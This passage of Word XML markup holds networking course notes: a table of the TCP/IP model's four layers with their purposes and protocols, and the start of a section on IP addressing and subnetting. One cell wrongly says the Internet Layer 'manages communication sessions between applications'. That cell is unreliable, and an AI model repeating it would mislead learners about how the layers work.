            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="46BB0A98" w14:textId="77777777" w:rsidR="00475AEF" w:rsidRPr="00B21970" w:rsidRDefault="00475AEF" w:rsidP="00475AEF">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:t>Application</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="01DA7CE9" w14:textId="77777777" w:rsidR="00475AEF" w:rsidRPr="00475AEF" w:rsidRDefault="00475AEF" w:rsidP="00475AEF">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00475AEF">
              <w:t>Combines OSI Layers 5, 6, and 7</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35F69DD5" w14:textId="77777777" w:rsidR="00475AEF" w:rsidRPr="00475AEF" w:rsidRDefault="00475AEF" w:rsidP="00475AEF">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00475AEF">
              <w:t>Purpose: Provides network services to applications</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10924994" w14:textId="2F80F8EE" w:rsidR="00475AEF" w:rsidRPr="00475AEF" w:rsidRDefault="00475AEF" w:rsidP="00475AEF">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="571D7CDE" w14:textId="4FB46054" w:rsidR="00475AEF" w:rsidRPr="00B21970" w:rsidRDefault="00475AEF" w:rsidP="00475AEF">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00475AEF">
              <w:t>Everything users interact with directly</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B9702B4" w14:textId="77777777" w:rsidR="00475AEF" w:rsidRPr="00475AEF" w:rsidRDefault="00475AEF" w:rsidP="00475AEF">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="81"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="clear" w:pos="720"/>
              </w:tabs>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="273" w:hanging="225"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00475AEF">
              <w:t>HTTP/HTTPS: Web browsing and APIs</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B4F8A29" w14:textId="77777777" w:rsidR="00475AEF" w:rsidRPr="00475AEF" w:rsidRDefault="00475AEF" w:rsidP="00475AEF">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="81"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="clear" w:pos="720"/>
              </w:tabs>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="273" w:hanging="225"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00475AEF">
              <w:t>FTP/SFTP: File transfers</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15741E6A" w14:textId="77777777" w:rsidR="00475AEF" w:rsidRPr="00475AEF" w:rsidRDefault="00475AEF" w:rsidP="00475AEF">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="81"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="clear" w:pos="720"/>
              </w:tabs>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="273" w:hanging="225"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00475AEF">
              <w:t>SMTP/POP3/IMAP: Email</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22BF81FB" w14:textId="77777777" w:rsidR="00475AEF" w:rsidRPr="00475AEF" w:rsidRDefault="00475AEF" w:rsidP="00475AEF">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="81"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="clear" w:pos="720"/>
              </w:tabs>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="273" w:hanging="225"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00475AEF">
              <w:t>SSH: Secure remote access</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27EA39E0" w14:textId="77777777" w:rsidR="00475AEF" w:rsidRPr="00475AEF" w:rsidRDefault="00475AEF" w:rsidP="00475AEF">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="81"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="clear" w:pos="720"/>
              </w:tabs>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="273" w:hanging="225"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00475AEF">
              <w:t>DNS: Domain name resolution</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="214C4324" w14:textId="1B1DB761" w:rsidR="00475AEF" w:rsidRPr="00475AEF" w:rsidRDefault="00475AEF" w:rsidP="00475AEF">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="81"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="clear" w:pos="720"/>
              </w:tabs>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="273" w:hanging="225"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00475AEF">
              <w:t>DHCP: Automatic IP configuration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00475AEF" w:rsidRPr="00B21970" w14:paraId="4522141F" w14:textId="77777777" w:rsidTr="00475AEF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1BF5CAC1" w14:textId="54375089" w:rsidR="00475AEF" w:rsidRPr="00B21970" w:rsidRDefault="00475AEF" w:rsidP="00475AEF">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F701226" w14:textId="727F451C" w:rsidR="00475AEF" w:rsidRPr="00B21970" w:rsidRDefault="00475AEF" w:rsidP="00475AEF">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00475AEF">
              <w:t>Transport Layer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6401666F" w14:textId="1026D0AE" w:rsidR="00475AEF" w:rsidRPr="00475AEF" w:rsidRDefault="00475AEF" w:rsidP="00475AEF">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00475AEF">
              <w:t>Same as OSI Layer 4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24C3927C" w14:textId="77777777" w:rsidR="00475AEF" w:rsidRPr="00475AEF" w:rsidRDefault="00475AEF" w:rsidP="00475AEF">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00475AEF">
              <w:t>Purpose: End-to-end communication and reliability</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="497512F2" w14:textId="010CD2D8" w:rsidR="00475AEF" w:rsidRPr="00475AEF" w:rsidRDefault="00475AEF" w:rsidP="00475AEF">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02085E48" w14:textId="77777777" w:rsidR="00475AEF" w:rsidRPr="00475AEF" w:rsidRDefault="00475AEF" w:rsidP="00475AEF">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="83"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="clear" w:pos="720"/>
              </w:tabs>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="212" w:hanging="210"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00475AEF">
              <w:t>Port numbers for application identification</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1615928D" w14:textId="77777777" w:rsidR="00475AEF" w:rsidRPr="00475AEF" w:rsidRDefault="00475AEF" w:rsidP="00475AEF">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="83"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="clear" w:pos="720"/>
              </w:tabs>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="212" w:hanging="210"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00475AEF">
              <w:t>Flow control and error recovery (TCP)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B64B145" w14:textId="0D4B40CA" w:rsidR="00475AEF" w:rsidRPr="00B21970" w:rsidRDefault="00475AEF" w:rsidP="00475AEF">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="83"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="clear" w:pos="720"/>
              </w:tabs>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="212" w:hanging="210"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00475AEF">
              <w:t>Segmentation and reassembly</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="522D12CD" w14:textId="77777777" w:rsidR="00475AEF" w:rsidRPr="00475AEF" w:rsidRDefault="00475AEF" w:rsidP="00475AEF">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="82"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="clear" w:pos="720"/>
              </w:tabs>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="300" w:hanging="247"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00475AEF">
              <w:t>TCP: Reliable, connection-oriented</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50F1785C" w14:textId="5E4A63EC" w:rsidR="00475AEF" w:rsidRPr="00475AEF" w:rsidRDefault="00475AEF" w:rsidP="00475AEF">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="82"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="clear" w:pos="720"/>
              </w:tabs>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="300" w:hanging="247"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00475AEF">
              <w:t>UDP: Unreliable, connectionless</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00475AEF" w:rsidRPr="00B21970" w14:paraId="383F3398" w14:textId="77777777" w:rsidTr="00475AEF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="476AC220" w14:textId="7BB17BA6" w:rsidR="00475AEF" w:rsidRPr="00B21970" w:rsidRDefault="00475AEF" w:rsidP="00475AEF">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11012C93" w14:textId="77777777" w:rsidR="00475AEF" w:rsidRPr="00475AEF" w:rsidRDefault="00475AEF" w:rsidP="00475AEF">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00475AEF">
              <w:t>Internet Layer</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65A62FCC" w14:textId="4FB9410B" w:rsidR="00475AEF" w:rsidRPr="00B21970" w:rsidRDefault="00475AEF" w:rsidP="00475AEF">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="33848DB6" w14:textId="77777777" w:rsidR="00475AEF" w:rsidRPr="00475AEF" w:rsidRDefault="00475AEF" w:rsidP="00475AEF">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00475AEF">
              <w:t>Manages communication sessions between applications</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F25BD46" w14:textId="77777777" w:rsidR="00475AEF" w:rsidRPr="00475AEF" w:rsidRDefault="00475AEF" w:rsidP="00475AEF">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00475AEF">
              <w:t>Gets data from source network to destination network</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F3D4878" w14:textId="6E0E8C35" w:rsidR="00475AEF" w:rsidRPr="00B21970" w:rsidRDefault="00475AEF" w:rsidP="00475AEF">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="359190E5" w14:textId="77777777" w:rsidR="00475AEF" w:rsidRPr="00475AEF" w:rsidRDefault="00475AEF" w:rsidP="00475AEF">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="84"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="clear" w:pos="720"/>
                <w:tab w:val="num" w:pos="353"/>
              </w:tabs>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:hanging="642"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00475AEF">
              <w:t>IP: Internet Protocol (IPv4/IPv6)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C706E72" w14:textId="2971C84A" w:rsidR="00475AEF" w:rsidRPr="00475AEF" w:rsidRDefault="00475AEF" w:rsidP="00475AEF">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="84"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="clear" w:pos="720"/>
                <w:tab w:val="num" w:pos="353"/>
              </w:tabs>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:hanging="642"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00475AEF">
              <w:t>ICMP: Error messages</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7049C94D" w14:textId="77777777" w:rsidR="00475AEF" w:rsidRPr="00475AEF" w:rsidRDefault="00475AEF" w:rsidP="00475AEF">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="84"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="clear" w:pos="720"/>
                <w:tab w:val="num" w:pos="353"/>
              </w:tabs>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:hanging="642"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00475AEF">
              <w:t>ARP: Address resolution</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59BC9086" w14:textId="77777777" w:rsidR="00475AEF" w:rsidRPr="00475AEF" w:rsidRDefault="00475AEF" w:rsidP="00475AEF">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="84"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="clear" w:pos="720"/>
                <w:tab w:val="num" w:pos="353"/>
              </w:tabs>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:hanging="642"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00475AEF">
              <w:t>Routing Protocols: OSPF, RIP, BGP</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D121D20" w14:textId="45ADBF52" w:rsidR="00475AEF" w:rsidRPr="00475AEF" w:rsidRDefault="00475AEF" w:rsidP="00475AEF">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:tabs>
                <w:tab w:val="num" w:pos="353"/>
              </w:tabs>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:hanging="642"/>
              <w:jc w:val="left"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00475AEF" w:rsidRPr="00B21970" w14:paraId="10B4C064" w14:textId="77777777" w:rsidTr="00475AEF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6BAB2043" w14:textId="19FC4507" w:rsidR="00475AEF" w:rsidRPr="00B21970" w:rsidRDefault="00475AEF" w:rsidP="00475AEF">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4727F9DE" w14:textId="77777777" w:rsidR="00475AEF" w:rsidRPr="00475AEF" w:rsidRDefault="00475AEF" w:rsidP="00475AEF">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00475AEF">
              <w:t>Network Access Layer</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F01A693" w14:textId="7F0392E9" w:rsidR="00475AEF" w:rsidRPr="00B21970" w:rsidRDefault="00475AEF" w:rsidP="00475AEF">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="192F16BE" w14:textId="77777777" w:rsidR="00475AEF" w:rsidRPr="00475AEF" w:rsidRDefault="00475AEF" w:rsidP="00475AEF">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00475AEF">
              <w:t>Combines OSI Layers 1 and 2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E883BCF" w14:textId="77777777" w:rsidR="00475AEF" w:rsidRPr="00475AEF" w:rsidRDefault="00475AEF" w:rsidP="00475AEF">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00475AEF">
              <w:t>Purpose: Physical network access</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D600F2D" w14:textId="1130D384" w:rsidR="00475AEF" w:rsidRPr="00475AEF" w:rsidRDefault="00475AEF" w:rsidP="00475AEF">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0932E68D" w14:textId="77193DBB" w:rsidR="00475AEF" w:rsidRPr="00B21970" w:rsidRDefault="00475AEF" w:rsidP="00475AEF">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00475AEF">
              <w:t>Handles local network delivery and physical transmission</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3725C2AA" w14:textId="77777777" w:rsidR="00475AEF" w:rsidRPr="00475AEF" w:rsidRDefault="00475AEF" w:rsidP="00475AEF">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="85"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="clear" w:pos="720"/>
                <w:tab w:val="num" w:pos="353"/>
              </w:tabs>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:hanging="642"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00475AEF">
              <w:t>Ethernet: Wired LANs</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3EA9D551" w14:textId="77777777" w:rsidR="00475AEF" w:rsidRPr="00475AEF" w:rsidRDefault="00475AEF" w:rsidP="00475AEF">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="85"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="clear" w:pos="720"/>
                <w:tab w:val="num" w:pos="353"/>
              </w:tabs>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:hanging="642"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00475AEF">
              <w:t>Wi-Fi: Wireless LANs</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14694AF0" w14:textId="77777777" w:rsidR="00475AEF" w:rsidRPr="00475AEF" w:rsidRDefault="00475AEF" w:rsidP="00475AEF">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="85"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="clear" w:pos="720"/>
                <w:tab w:val="num" w:pos="353"/>
              </w:tabs>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:hanging="642"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00475AEF">
              <w:t>PPP: Point-to-point links</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="266C89BE" w14:textId="77777777" w:rsidR="00475AEF" w:rsidRPr="00475AEF" w:rsidRDefault="00475AEF" w:rsidP="00475AEF">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="85"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="clear" w:pos="720"/>
                <w:tab w:val="num" w:pos="353"/>
              </w:tabs>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:hanging="642"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00475AEF">
              <w:t>Frame Relay: WAN connections</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00C3615B" w14:textId="0E037ED7" w:rsidR="00475AEF" w:rsidRPr="00475AEF" w:rsidRDefault="00475AEF" w:rsidP="00475AEF">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:tabs>
                <w:tab w:val="num" w:pos="353"/>
              </w:tabs>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:hanging="642"/>
              <w:jc w:val="left"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="39989400" w14:textId="1AD49AFC" w:rsidR="00740027" w:rsidRDefault="00740027" w:rsidP="001F0FE1">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73518547" w14:textId="77777777" w:rsidR="0074642F" w:rsidRDefault="0074642F">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial Black" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C936F0B" w14:textId="09008095" w:rsidR="001F0FE1" w:rsidRDefault="0074642F" w:rsidP="00C75443">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="0074642F">
        <w:lastRenderedPageBreak/>
        <w:t>IP Addressing &amp; Subnetting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E504C0" w14:textId="77777777" w:rsidR="00087B8D" w:rsidRPr="00087B8D" w:rsidRDefault="00087B8D" w:rsidP="00672E5B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00087B8D">
        <w:t>Introduction to IP Addressing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F4341D" w14:textId="77777777" w:rsidR="00087B8D" w:rsidRPr="00087B8D" w:rsidRDefault="00087B8D" w:rsidP="00672E5B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00087B8D">
        <w:t>Definition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617FE166" w14:textId="77777777" w:rsidR="00087B8D" w:rsidRDefault="00087B8D" w:rsidP="00087B8D">
      <w:r w:rsidRPr="00087B8D">
        <w:t xml:space="preserve">IP addressing is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00087B8D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>numerical labeling system</w:t>
      </w:r>
      <w:r w:rsidRPr="00087B8D">
        <w:t xml:space="preserve"> used to </w:t>
      </w:r>
      <w:r w:rsidRPr="00087B8D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>identify and locate devices on a computer network</w:t>
      </w:r>
      <w:r w:rsidRPr="00087B8D">
